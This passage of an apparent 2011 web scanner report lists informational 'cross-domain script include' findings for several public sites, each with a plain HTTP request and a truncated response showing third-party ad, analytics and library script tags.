<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>
<script>
if (!window.its) window.it
...[SNIP]...
</script>


<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/8506/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/8506/web-storefront-preview.jsz"></script>
...[SNIP]...

21.9. https://login.yahoo.com/config/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /config/login HTTP/1.1
Host: login.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:50 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 49854


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</script>
<script type="text/javascript" src="https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_connection_2.8.2_inc_superads_capslock_loginmd5_min_12.js"></script>
...[SNIP]...

21.10. http://notredame-hospitality.cbscollegestore.com/store.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notredame-hospitality.cbscollegestore.com
Path:   /store.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store.cfm HTTP/1.1
Host: notredame-hospitality.cbscollegestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:30 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45806

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script typ
...[SNIP]...
<!-- CNET tag for reporting OAS traffic -->
       <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

21.11. https://observ.subscribeobserver.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://observ.subscribeobserver.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: observ.subscribeobserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:25:42 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Circulation - CharlotteObserver.com</title>
<link href="h
...[SNIP]...
<link href="http://www.charlotteobserver.com/static/styles/vendor/vendor_cu/vendor.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="http://media.charlotteobserver.com/misites/clt/charlotte.js"></script>
...[SNIP]...
<!-- SiteCatalyst: McClatchy Vendor Stats Tag v.1.0 -->
<script language="JavaScript" type="text/javascript" src="http://media.charlotteobserver.com/mistats/products/pubsys_s_code.js"></script>
<script language="JavaScript" type="text/javascript" src="http://media.charlotteobserver.com/mistats/products/pubsys.js"></script>

<script language="JavaScript" type="text/javascript" src="http://media.charlotteobserver.com/mistats/finalizestats.js"></script>
...[SNIP]...

21.12. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4462/5032; rdk15=0; ses15=5032^1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:17 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:45:17 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:45:17 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^2&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=112482; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2173

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script src='http://ad.turn.com/server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=26912083&ahcid=2168938&bimpd=1q9TIpCmi1EdJohtUWz0lJ5a-pSOMHS7Ezy2FjI_vHrXiq8hAV11XPhafQktepoS-8rqguAbcgm8jBc_ypDM6L8wvAhJVp5vH1605NNaPKgd1x29xXl5OSgnSbh900QIWnzm0g3dvqzmL8voAmXoTtff2qOd8TAuM1o70SLAMfwCKpFmO4iIlB0kM7YKTICsShd3uegFPM5xOANTmG-u1JbI3CqAW-xcD_QEe386RDj1xjwbsNZFsKJut-wOE8nAr9YVatunbiAZAqr48mcZONXeRnQwv4vmdjbWA-GfKq4ICbnFGLtQD8yP_S3oZsbK1W6wp1bOqfXjFaREiyr2WhbN_AQhQZWpugTa6X6c9ek5k32s-ADSHzfLME1qSH4I3WNdkcYt41xnLj02NCh6z6yV5S_s7CGYbkSuSOV1dy9riB2_lRUwHmgNnVv8Z-1EhLfWSwI4w4uw-MZpH7nR0Kxj9pvyOlPugZWDlzNTme1-NVogyIlbI1Q083pFcjlLTx0P-h_rWTkucJCGcQUSz8gNA148HlKYlS27VQ0aTwrTT_eA52mCatOncnLvglOXvfBz5xDsVEqchMpjM7fNhftKFt6mtwILgy-yM2mplJKlL1R5lnQi8njXSm7iSWQul0ohXxHabAlqpPokL6-2DLPbXvgXG5G_iJyiuYeWEQiDv87ryg5KhVVUmj_2IN_QHgSyrc-_WNzPiO_kdyWr_fJlNR2L2B8S2Z2dnFHKHzGjsZQyAQ6kVAwWSib4A4xDZrbyk0__ntU9XzUlV3N0ao9MuA-hZzGxRdI_-VJWChwqntp-8j38wEd1ezH0LZQcf4VYLVvzEzWX5ctvkm4Uz30lpriMl-1v60tkD4B8fShZA5xP-LKOGfmI9Q4im5wVCalT7hKQiqHP8W7OqEJPgwNKEhESwEDwDinJfsY1PlXw0sAoKrQANkKorThvVW5_&acp=F2A40808BF222937&rtbacid=3ac1d9216377d94e63eb63894d8f45c94029a655'></script>
...[SNIP]...

21.13. http://s3.cinesport.com/app_v2/csprt_player.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s3.cinesport.com
Path:   /app_v2/csprt_player.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /app_v2/csprt_player.js HTTP/1.1
Host: s3.cinesport.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/players/charlotteobservergeneric.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-322959065-1315097103938

Response

HTTP/1.1 200 OK
x-amz-id-2: 7N8AR+V6H3fSQl9HTVH58l2vV4izrizvgmS/bK9Ow2cnmcwf6T0oDEAxSvB/aMrS
x-amz-request-id: 848CBB4F41C7E116
Date: Sun, 04 Sep 2011 00:44:27 GMT
Last-Modified: Fri, 08 Jul 2011 17:46:03 GMT
ETag: "4576309e2337649c8338206a0f56140b"
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Length: 13798
Server: AmazonS3

       var playerLoop;
       var contextualTag;
       var bcExp;
       var modAd;
       var displayAdPresent = false;
       var adslot_300x60;
       var adslot_300x250;
       var bgcolor = '#666666';
       var fgcolor = '#ffffff';
       var
...[SNIP]...
</div><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

21.14. http://s3.cinesport.com/players/charlotteobservergeneric.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s3.cinesport.com
Path:   /players/charlotteobservergeneric.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /players/charlotteobservergeneric.html HTTP/1.1
Host: s3.cinesport.com
Proxy-Connection: keep-alive
Referer: http://cdn.cinesport.com/container.html?id=charlotteobservergeneric
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: 1Nr266wXC7EHsvmxpWWcHS3AhMNbX8MZOTe62e6yFQbTYtssS6ug80EYLTQf1Vt/
x-amz-request-id: 4C5A99403DE6AC76
Date: Sun, 04 Sep 2011 01:03:56 GMT
x-amz-meta-s3fox-filesize: 2239
x-amz-meta-s3fox-modifiedtime: 1311796338000
Last-Modified: Wed, 27 Jul 2011 19:52:37 GMT
ETag: "f68aa828ce98884963501e8c0b7a6dd3"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 2239
Server: AmazonS3

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
       <title>Container<
...[SNIP]...
<link rel="stylesheet" href="http://s3.cinesport.com/app_v2/player.css" type="text/css"/>
   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- BANNER AD RELATED HEAD -->
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
   </script>
...[SNIP]...

21.15. http://sacramentoconnect.sacbee.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sacramentoconnect.sacbee.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: sacramentoconnect.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:34 GMT
Server: Apache/2.2.16 (Amazon)
Last-Modified: Sun, 04 Sep 2011 00:43:30 GMT
ETag: "16daf-4ac12e2205080"
Accept-Ranges: bytes
Content-Length: 93615
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Sun, 04 Sep 2011 01:43:30 GMT
Vary: Accept-Encoding,Cookie
X-Pingback: http://sacramentoconnect.sacbee.com/wordpress/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.2.3
Pragma: public
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>

<script type="text/javascript" src="http://e.yieldmanager.net/script.js"></script>
...[SNIP]...
<br /><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

21.16. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.barnesandnoble.com
Path:   /The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826 HTTP/1.1
Host: search.barnesandnoble.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
P3P: CP="CAO DSP COR ADM DEV TAI PSA IVDo CONo HIS TELo DEL SAMo UNRo LEG PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 122283
Date: Sun, 04 Sep 2011 01:23:43 GMT
Connection: close
Set-Cookie: pds%5Fprof%5Flife=d=%2f0%2fSNRQANJZKOAJECq4fuATs16FghsQBYQAIAAoAewAAAHwAAgAAAAAAAAAAAAAA&v=5; domain=.barnesandnoble.com; expires=Fri, 02-Sep-2016 01:23:43 GMT; path=/
Set-Cookie: pds%5Flife=d=AQAw9qTVv8oLrLVmei2ledNrPyUXm7x5jgqi12MjRitKAKjnGigKHspVh2gOF1gyvghtGR%2ffErW1kHRLKuMKmS6B&v=5; domain=.barnesandnoble.com; expires=Fri, 02-Sep-2016 01:23:43 GMT; path=/
Set-Cookie: pds%5Fsess=d=AQDHu9rRnD%2fjrm8xcUgxEoj1Ylkl91VD8B%2bNGqKkf2oKsODN%2bAeOfCX4zlRMNjdk3QTJPGq5srW21wstdDzZfL2wxAnpys7HVCWpD97KNbjNRaKzSOJKXov3Z%2fvO1s3OLEc%3d&v=5; domain=.barnesandnoble.com; path=/
Set-Cookie: pds%5Fvcart%5Fsess=d=dof%2fQCAAIDJzmP6bP5jsrwnis1h3Kt8OO9Ec3ZRg76Y4McQBYQAEAAIAaQAAAAQA&v=5; domain=.barnesandnoble.com; path=/

...<!DOCTYPE html SYSTEM "about:legacy-compat"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="description" content="BARNES &amp; NOBLE: The Sacramento Bee b
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://img1.imagesbn.com/presources/product/css/product-book-widgets-v3.css"> <script type="text/javascript" src="http://img1.imagesbn.com/pace/js/externro/jquery-1.4.2.min.js"> </script>
...[SNIP]...
</script><script type="text/javascript" src="http://img1.imagesbn.com/presources/community/js/jquery-latest.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/pace/js/externro/jquery.tools.min.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/pace/js/core/core.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/global/js/bn.ui.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/global/js/bn.nav.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/global/js/jquery/plugins/jquery.hoverintent.js"> </script>
...[SNIP]...
</script><script type="text/javascript" src="http://img1.imagesbn.com/pimages/js/bn_analytics.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/community/js/ui.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/pimages/js/productpreview.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/pimages/js/bnnav.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/js/signin.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/js/bnNavEvents.js"> </script>
...[SNIP]...
</script><script type="text/javascript" src="http://img1.imagesbn.com/presources/js/visualcart_prodid.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/js/webservice-core_v2.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/pimages/iframe/iframeKMP.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/js/bnautosuggest.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/community/js/reviews.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/community/js/share_this_page.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/js/dropdownbn07.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/js/formbn07.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/product/js/jquerypdp07.js"> </script><script language="Javascript" src="http://img1.imagesbn.com/pimages/js/modPop.js"> </script><script language="Javascript" src="http://img1.imagesbn.com/pimages/js/imgviewer.js"> </script><script language="Javascript" src="http://img1.imagesbn.com/presources/product/js/productPage.js"> </script>
...[SNIP]...
</div> <script type="text/javascript" src="http://img1.imagesbn.com/presources/global/js/bn-global.js"> </script>
...[SNIP]...

21.17. http://slashdot.org/bookmark.pl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://slashdot.org
Path:   /bookmark.pl

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bookmark.pl HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
X-Powered-By: Slash 2.00500120110825.03
X-Bender: You can trust anything!
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 15218
Date: Sun, 04 Sep 2011 01:24:04 GMT
X-Varnish: 19386691
Age: 0
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>

<meta name="viewport" content="width=device-width, user-scalable=yes, initial-scale=1.0, maximum-scale=10.0" />
<meta name="apple-mobile-web-app-capab
...[SNIP]...
<![endif]-->


<script src="//a.fsdn.com/sd/all-minified.js?release_20110825.03" type="text/javascript"></script>
...[SNIP]...

21.18. http://stockscreener.us.reuters.com/Stock/US/Index

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stockscreener.us.reuters.com
Path:   /Stock/US/Index

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Stock/US/Index HTTP/1.1
Host: stockscreener.us.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Sun, 04 Sep 2011 01:24:18 GMT
Content-Length: 44685
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND", policyref="/w3c/p3p.xml"
Set-Cookie: 2175%5F0=33102379A759622F79DDD60D2E655902; path=/; HttpOnly
Set-Cookie: GZIP=0; expires=Tue, 04-Oct-2011 01:24:18 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Reuters.com | Stock S
...[SNIP]...
<!-- begin ad tag (tile=1) -->
               <script language='JavaScript' src='http://ad.doubleclick.net/adj/us.reuters/bizfinance/stockscreener;type=leaderboard;tile=1;sz=728x90;ord=9065919?' type='text/javascript'></script>
...[SNIP]...
<!-- begin ad tag-->
               <script language='JavaScript' src='http://ad.doubleclick.net/adj/us.reuters/bizfinance/stockscreener;type=sponsorlogo;sz=1x1;ord=9065919?' type='text/javascript'></script>
...[SNIP]...
<!-- begin ad tag (tile=2) -->
               <script language='JavaScript' src='http://ad.doubleclick.net/adj/us.reuters/bizfinance/stockscreener;type=mpu;tile=2;sz=300x250;ord=9065919?' type='text/javascript'></script>
...[SNIP]...

21.19. http://und.cbscollegestore.com/store.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://und.cbscollegestore.com
Path:   /store.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store.cfm HTTP/1.1
Host: und.cbscollegestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:22 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66505

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script typ
...[SNIP]...
<!-- CNET tag for reporting OAS traffic -->
       <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

21.20. http://und.cbscollegestore.com/store_contents.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://und.cbscollegestore.com
Path:   /store_contents.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store_contents.cfm HTTP/1.1
Host: und.cbscollegestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:27 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74160

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script typ
...[SNIP]...
<!-- CNET tag for reporting OAS traffic -->
       <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

21.21. http://www.bayareasearchengineacademy.org/blog/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bayareasearchengineacademy.org
Path:   /blog/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog/ HTTP/1.1
Host: www.bayareasearchengineacademy.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:25:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Pingback: http://www.bayareasearchengineacademy.org/blog/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 86552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<!-- /all in one seo pack -->
<script charset="utf-8" type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="How To Learn SEO Online" url="http://www.bayareasearchengineacademy.org/blog/?p=394"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="Five Free Keyword Research Tools for SEO and Article Generating Ideas" url="http://www.bayareasearchengineacademy.org/blog/?p=383"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="Livermore Chamber of Commerce Marketing Summit" url="http://www.bayareasearchengineacademy.org/blog/?p=367"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="East Bay SEO and Internet Marketing Meetup" url="http://www.bayareasearchengineacademy.org/blog/?p=362"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="Google's Webmaster Tools Have Exciting New Features" url="http://www.bayareasearchengineacademy.org/blog/?p=356"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="When Social Media Turns, Well, "Social"" url="http://www.bayareasearchengineacademy.org/blog/?p=349"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="How to Submit Your Website to a Search Engine for Free" url="http://www.bayareasearchengineacademy.org/blog/?p=335"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="Get Your Business Listed On Google Maps In Five Steps" url="http://www.bayareasearchengineacademy.org/blog/?p=322"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="Facebook Security for Professionals: How To Manage Your Friends" url="http://www.bayareasearchengineacademy.org/blog/?p=315"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="30 Day Blogging Challenge - Post #1" url="http://www.bayareasearchengineacademy.org/blog/?p=302"></script>
...[SNIP]...
</script><script src="http://nwidget.networkedblogs.com/getnetworkwidget?bid=499174" type="text/javascript"></script>
...[SNIP]...

21.22. http://www.careerbuilder.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51606
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEARWEB54
Date: Sun, 04 Sep 2011 01:25:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/movingobj.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jobseeker/jobcenter.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jobseeker/ads/delayedad.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/popup.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jquery/dropshadow/jquery.dropshadow.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/searchbar.js"></script><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/autocomplete/cbautocomplete.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jobseeker/quickbarkeywordfocusfix.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://img.icbdr.com/common/js/SiteCatalystH.js"></script>
...[SNIP]...

21.23. http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /JobPoster/Products/PostJobsInfo.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /JobPoster/Products/PostJobsInfo.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36509
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
